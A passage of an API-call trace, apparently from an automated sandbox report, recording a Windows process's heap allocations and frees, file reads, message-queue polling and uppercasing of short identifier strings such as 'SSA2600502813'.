RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0152.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0152.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd4020 [0152.384] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0152.384] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xd7ac, lpOverlapped=0x0) returned 1 [0152.387] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0152.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd7ac) returned 0x2aaf410 [0152.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd4020 | out: hHeap=0x2af0000) returned 1 [0152.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0152.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd7ac) returned 0x2abcbc8 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd7ac) returned 0x2aaf410 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0152.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0152.393] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0152.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0152.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd7ac) returned 0x2aaf410 [0152.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0152.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1f8 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0152.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0152.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0152.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd7ac) returned 0x2aca380 [0152.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0152.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0152.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0152.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0152.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0152.395] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0152.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0152.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0152.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0152.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0152.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0152.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0152.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.398] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0152.398] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.398] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0152.398] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0152.398] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.398] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0152.398] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0152.398] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0152.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.398] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.398] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, 